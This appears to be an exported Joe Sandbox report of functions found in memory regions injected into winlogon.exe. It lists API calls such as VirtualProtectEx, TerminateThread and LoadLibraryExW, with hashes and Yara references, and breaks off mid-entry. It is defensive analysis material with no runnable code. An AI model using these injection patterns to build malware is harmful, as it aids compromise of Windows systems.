Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 082c9bc8e2b54f33c06a4e0ce0c83183c50a5791486485f9408bd7432f1d1996
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9281F429610E61A6FE51EBEEA84D39927D0EB45782F14C825AB0543FD6DB78C886CB01

Function 00000225DC6475F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000225DC647618
__scrt_acquire_startup_lock.LIBCMT ref: 00000225DC64766A
_RTC_Initialize.LIBCMT ref: 00000225DC647698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000225DC6476BE
__scrt_release_startup_lock.LIBCMT ref: 00000225DC6476E9

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: d6c8d0038f703ef3555841080360c3dda4cb30d5e061eb806b4afe574bebbefd
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 8F81E43C71CEB1BAFB50ABED984D3993291AB85B82F54C4A59A07477D6DB38C845CF00

Function 00000225DC6A75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000225DC6A7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000225DC6A766A
_RTC_Initialize.LIBCMT ref: 00000225DC6A7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000225DC6A76BE
__scrt_release_startup_lock.LIBCMT ref: 00000225DC6A76E9

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 491271a197424cec7ae9611870d67ced497b27d19dd61c21874c764fcc7bcc48
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: DE81A029704E61B6FB54EBED98493996291BB85B8BF28C0359A05C7796DF38C841CF10

Function 00000225DC649804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000225DC649889
GetLastError.KERNEL32 ref: 00000225DC649897
LoadLibraryExW.KERNEL32 ref: 00000225DC6498C1
FreeLibrary.KERNEL32 ref: 00000225DC649907
GetProcAddress.KERNEL32 ref: 00000225DC649913

Strings

api-ms-, xrefs: 00000225DC6498A9

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: a20be75b842d5dbd9bbbcbb21bfa971a606c85aff1cb8e04c4579895d74161fa
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 5A31A63925EF60B5EE129B9EA8087997398B709FA6F198965DD2F47344DF38C446C300

Function 00000225DC6A9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000225DC6A9889
GetLastError.KERNEL32 ref: 00000225DC6A9897
LoadLibraryExW.KERNEL32 ref: 00000225DC6A98C1
FreeLibrary.KERNEL32 ref: 00000225DC6A9907
GetProcAddress.KERNEL32 ref: 00000225DC6A9913

Strings

api-ms-, xrefs: 00000225DC6A98A9

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 9cdba6727cee948ec92796689e0fc12a033cc256fbb51a8d326bbfbcf46ff7c9
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: F731A539312E60B1FE15DF9AA80879963D4FB09BA6F398525DD2E87388DF38C446C300

Function 00000225DC651B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000225DC651BCD
GetLastError.KERNEL32 ref: 00000225DC651BD9
CloseHandle.KERNEL32 ref: 00000225DC651BF1
CreateFileW.KERNEL32 ref: 00000225DC651C1C
WriteConsoleW.KERNEL32 ref: 00000225DC651C3B

Strings

CONOUT$, xrefs: 00000225DC651BFD

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: b56bf77e3d38014fe6abc0fe981c7fccbbcf30d686bcff1290ba8758a7f2f1e9
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 2511C135324FA096E7509B9AE858319B3A0F388FE6F208224EA5D877A4CF7CC944C740

Function 00000225DC6B1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000225DC6B1BCD
GetLastError.KERNEL32 ref: 00000225DC6B1BD9
CloseHandle.KERNEL32 ref: 00000225DC6B1BF1
CreateFileW.KERNEL32 ref: 00000225DC6B1C1C
WriteConsoleW.KERNEL32 ref: 00000225DC6B1C3B

Strings

CONOUT$, xrefs: 00000225DC6B1BFD

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: ff14af893957ffea3ab595c473683dca06a5ffb8dd3d70eb8a6ca617f63c2a3b
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 5B118F25314F6096F7509B9AE84831973A5F788FE7F048224EA5D877A8DF78C944C740

Function 00000225DC6A5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC6A5C4B
GetThreadContext.KERNEL32 ref: 00000225DC6A5DB5

Part of subcall function 00000225DC6A5A40: GetCurrentThreadId.KERNEL32 ref: 00000225DC6A5A44

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: e6aa45671075f40753d66a7eea4d3308441a16fac4b1c48fe7a6f7faecb46b0f
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 2DD19C7A208F9895DA70DB5AE49835A77A0F7C8B89F144116EACD87BA9DF3CC541CF00

Function 00000225DC6430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6430D7
HeapAlloc.KERNEL32 ref: 00000225DC6430EA
StrCmpNIW.SHLWAPI ref: 00000225DC64316B
GetProcessHeap.KERNEL32 ref: 00000225DC6431D1
HeapFree.KERNEL32 ref: 00000225DC6431DF

Strings

dialer, xrefs: 00000225DC643164

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 043bd55ba01abd2451815a23672e2e217f532292a58b40aff087af92420aa0a0
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 7031A469709F69E2EB25DF9EE94826977A0FB44F86F04C4309E4A07B54EF38C4A1C700

Function 00000225DC6A30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6A30D7
HeapAlloc.KERNEL32 ref: 00000225DC6A30EA
StrCmpNIW.SHLWAPI ref: 00000225DC6A316B
GetProcessHeap.KERNEL32 ref: 00000225DC6A31D1
HeapFree.KERNEL32 ref: 00000225DC6A31DF

Strings

dialer, xrefs: 00000225DC6A3164

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: b457cad7c676fafc82753b1c6210a0d789cf7538bdb68c18cb7cab4602b27ae2
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 7131B169701F61A2EB55DF9AE80826973A1FB44F86F18C0309E4887B55EF38D8A1C700

Function 00000225DC641A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000225DC641A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000225DC641A58
PathFindFileNameW.SHLWAPI ref: 00000225DC641A67
lstrlenW.KERNEL32 ref: 00000225DC641A73
StrCpyW.SHLWAPI ref: 00000225DC641A86
CloseHandle.KERNEL32 ref: 00000225DC641A94

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 258d30db1b86f1ee08310560d6057e4c708c8021364d2525115f470b83f8a513
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 6C016D25314E51A6EB20DBA6A45C35973A1F788FC2F588835CE8A43754DF3DC985C700

Function 00000225DC6A1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000225DC6A1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000225DC6A1A58
PathFindFileNameW.SHLWAPI ref: 00000225DC6A1A67
lstrlenW.KERNEL32 ref: 00000225DC6A1A73
StrCpyW.SHLWAPI ref: 00000225DC6A1A86
CloseHandle.KERNEL32 ref: 00000225DC6A1A94

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 42d9fa172b430958819c4ff7d7228036ea3807f12f409a3c11b57c6c254329aa
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: A7018065304E51A6EB10DB9AE45C35963A6FB88FC2F588035CF8D83754DE3DC985C700

Function 00000225DC6437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000225DC6437C8
GetCurrentProcess.KERNEL32 ref: 00000225DC6437D6
VirtualProtectEx.KERNEL32 ref: 00000225DC6437F8
GetCurrentProcess.KERNEL32 ref: 00000225DC643819
VirtualProtectEx.KERNEL32 ref: 00000225DC64383A
TerminateThread.KERNEL32 ref: 00000225DC643849

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a9f07ffff90aed63a477e6b5be0fa8bb21007e75bcb8cc0cc0795d7558385851
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: FC112D69625F64A6FB259FA9E40D716B7A0BB58F86F248834CD5947754EF3CC408C700

Function 00000225DC6A37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000225DC6A37C8
GetCurrentProcess.KERNEL32 ref: 00000225DC6A37D6
VirtualProtectEx.KERNEL32 ref: 00000225DC6A37F8
GetCurrentProcess.KERNEL32 ref: 00000225DC6A3819
VirtualProtectEx.KERNEL32 ref: 00000225DC6A383A
TerminateThread.KERNEL32 ref: 00000225DC6A3849

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 7e87ff89447f8c9844c9ab18e43472e70f8c6630eec8e89a1bfbab50abdafd68
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 0B111769711F60A2EB249BA9E81D71A67A5BB48F87F148438CA5D47764EF3CC408C700

Function 00000225DC6490D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC649103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC649198
RtlUnwindEx.NTDLL ref: 00000225DC6491E7

Strings

csm, xrefs: 00000225DC64917E
f, xrefs: 00000225DC649116

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: d8b70030c570faa1b5d807255593d4be8cae63427be600f7cb8e87c94ce45865
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 3A519F3A26DA20AAEB14DF99E44CB5A3799F344B99F50C560DE574778CDB35C842C700

Function 00000225DC6A90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000225DC6A9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000225DC6A9198
RtlUnwindEx.NTDLL ref: 00000225DC6A91E7

Strings

csm, xrefs: 00000225DC6A917E
f, xrefs: 00000225DC6A9116

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: b1229b4797e63ac8a5cc894578b2046acdbc88e47101dd89d15c080535e2d269
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 3451D33A725A20AAEB14CF99E44CB593795F784BAAF70C120DE5687B8CDB35DC42C700

Function 00000225DC641AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000225DC641AD8
StrCmpNIW.SHLWAPI ref: 00000225DC641AF2
lstrlenW.KERNEL32 ref: 00000225DC641B01
StrCpyW.SHLWAPI ref: 00000225DC641B16

Strings

\\?\, xrefs: 00000225DC641AE6

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: f112a6754a55382dbfdf9b1daadc51079be1241575beae1d4f281bfb9662e5ad
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: F6F04F66318E51A2EB208BA9F49D39A6760F744F8AF94C030DA4947A64DF3CC688CB00

Function 00000225DC6A1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000225DC6A1AD8
StrCmpNIW.SHLWAPI ref: 00000225DC6A1AF2
lstrlenW.KERNEL32 ref: 00000225DC6A1B01
StrCpyW.SHLWAPI ref: 00000225DC6A1B16

Strings

\\?\, xrefs: 00000225DC6A1AE6

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: f4a0d93a0200a0849846c65a0c243f4471c374eee0b62f1cad352672f2f24cd4
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 67F04F66304E51A2EB209BA9F4D835A6761F744B8AF94C030DA4986A64DE3CC688CB00

Function 00000225DC643200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000225DC643222
StrCpyW.SHLWAPI ref: 00000225DC643232
StrCatW.SHLWAPI ref: 00000225DC64323E
PathCombineW.SHLWAPI ref: 00000225DC64324C

Strings

\\.\pipe\, xrefs: 00000225DC643218

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 3f87963079133cfab528efc465c2264cd1018eb2f7383f1bd84a27779a78dc6e
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 1AF0A72831CFA1A2EA008B9BB90D12A7220FB48FD2F18C531DE5B07B68CE3CC481C300

Function 00000225DC6A3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000225DC6A3222
StrCpyW.SHLWAPI ref: 00000225DC6A3232
StrCatW.SHLWAPI ref: 00000225DC6A323E
PathCombineW.SHLWAPI ref: 00000225DC6A324C

Strings

\\.\pipe\, xrefs: 00000225DC6A3218

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 9f3233603028e0b1b86c801d2ec784eda29a394b14b1e0c9d5dc5afa3b3aeb40
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 93F03728318FA0B1EA148B9BB95D1196762FB48FD3F18D131DE9A47B69DE3CC545C700

Function 00000225DC64A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000225DC64A154
GetProcAddress.KERNEL32 ref: 00000225DC64A16A
FreeLibrary.KERNEL32 ref: 00000225DC64A187

Strings

mscoree.dll, xrefs: 00000225DC64A14B
CorExitProcess, xrefs: 00000225DC64A163

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: d9b41130ff410577e9ff513638e825c8c1dfb14f427efc5cd3b7ef21c9094d7c
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 18F01269339F54B1EF555FE8E88C3652360EB48F92F64A469A50B46565DF38C488C700

Function 00000225DC6AA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000225DC6AA154
GetProcAddress.KERNEL32 ref: 00000225DC6AA16A
FreeLibrary.KERNEL32 ref: 00000225DC6AA187

Strings

mscoree.dll, xrefs: 00000225DC6AA14B
CorExitProcess, xrefs: 00000225DC6AA163

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 5162326cd7fa2c510cfb1c91353f0321b0cbc9f36ba7700a1e62234b400715e1
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 7FF01269325E54B1EF548FE8E88C3652361EF48B93F54A42AA50B85665DF38C488CB10

Function 00000225DC6A51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000225DC6A5236

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 9a801c7ccadc6eb3ff7e5ed26391364ae17ab8bbff456a3cc809a5239a07978d
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3E02D93A219F9496E760CB99F49435AB7A1F3C4795F204115EB8E87BA9EF7CC484CB00

Function 00000225DC650860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000225DC6508A2
GetConsoleMode.KERNEL32 ref: 00000225DC650960
GetLastError.KERNEL32 ref: 00000225DC6509EA

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: ee9ba1a2d261dc6c65b4e2d43ba4bb6869639d99bddb9c3186d9302fb3dd522e
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 4281C03AA34E30A9FB509FEDD8887AD27A1F784B96F648116DE0A5379ADB34C441C310

Function 00000225DC6B0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000225DC6B08A2
GetConsoleMode.KERNEL32 ref: 00000225DC6B0960
GetLastError.KERNEL32 ref: 00000225DC6B09EA

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 03290832ff825d699a5c2b122fcc6245b8018cd8e6285e07660d15faaa856b3d
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 9181C1BA710E34A9FB50AFED98583AD2BA2F784B87F54C516DE0A93792DB34C441C310

Function 00000225DC6457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

